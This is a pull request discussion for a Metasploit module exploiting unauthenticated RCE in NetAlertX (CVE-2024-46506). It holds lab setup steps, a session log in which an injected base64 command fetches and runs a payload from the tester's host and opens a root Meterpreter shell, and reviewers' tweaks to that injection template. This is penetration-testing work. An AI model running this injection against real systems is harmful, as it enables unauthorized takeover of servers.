Add NetAlertX unauthenticated RCE module (CVE-2024-46506)

[Takahiro-Yoko]

https://rhinosecuritylabs.com/research/cve-2024-46506-rce-in-netalertx/

Vulnerable Application

An attacker can update NetAlertX settings with no authentication, which results in RCE.

The vulnerability affects:

* v23.01.14 <= NetAlertX <= v24.9.12

This module was successfully tested on:

* NetAlertX v24.9.12 installed with Docker on Ubuntu 22.04

Installation

1. docker pull jokobsk/netalertx:24.9.12

2. docker run

docker run --rm --network=host \
  -v /tmp/netalertx:/app/config \
  -v /tmp/netalertx:/app/db \
  -e TZ=Europe/Berlin \
  -e PORT=20211 \
  jokobsk/netalertx:24.9.12

Verification Steps

1. Install the application
2. Start msfconsole
3. Do: use exploit/linux/http/netalertx_rce_cve_2024_46506
4. Do: run lhost=<lhost> rhost=<rhost>
5. You should get a meterpreter

Scenarios

msf6 > use exploit/linux/http/netalertx_rce_cve_2024_46506
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/netalertx_rce_cve_2024_46506) > run lhost=192.168.56.1 rhost=192.168.56.17
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 24.9.12 detected.
[*] Sent request to update DBCLNP_CMD to '/bin/bash -c echo${IFS}d2dldCAtcU8gLi9rblNZWmZCTkdiSyBodHRwOi8vMTkyLjE2OC41Ni4xOjgwODAvRy04Zjhua29IMGRUWkdQc052UzIzZztjaG1vZCAreCAuL2tuU1laZkJOR2JLOy4va25TWVpmQk5HYksmc2xlZXAgMztybSAtcmYgLi9rblNZWmZCTkdiSw==|base64${IFS}-d|/bin/bash'.
[*] Waiting settings really updated...
[*] Added the payload to the queue. Waiting for the payload to run...
[*] Sending stage (3045380 bytes) to 192.168.56.17
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:53484) at 2025-02-08 14:40:02 +0900
[*] Sent request to update DBCLNP_CMD to 'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}'.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.17
OS           :  (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

[msutovsky-r7]

Hi @Takahiro-Yoko , I left some comments, however, the module seems to be working. I'll do additional testing and provide feedback.

[msutovsky-r7]

Is there a some degree of certainty that wget should be present as default?

[Takahiro-Yoko]

(Assume Docker used) It seems that both curl and wget are available in the vulnerable version of the NetAlertX Docker container, so there may be no need to specify wget as the default. https://github.com/jokob-sk/NetAlertX/blob/v24.9.12/Dockerfile#L60 9f43fcc Thanks!

[jvoisin]

Suggested change

	cmd = "/bin/bash -c echo${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|/bin/bash"
	cmd = "/bin/sh -c echo${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|/bin/sh"

Smaller payload (yay!), and more portable, and not every Linux system has bash installed.

[bwatters-r7]

Do we need to encode manually? What characters are we trying to avoid and what happens we pass them into the payload portion of the info hash as bad characters?

[Takahiro-Yoko]

Thanks! Updated to use sh. edbdb98

Updated to use BadChars. 2db7f4f Seems like only base64 -d works fine. Without /bin/sh -c, the payload fails. Thanks!

[msutovsky-r7]

Release Notes

A new module for unauthenticated remote code execution bug in NetAlertX (CVE-2024-46506). An unauthenticated attacker can change system configuration and force application to run arbitrary system commands, leading to remote code execution.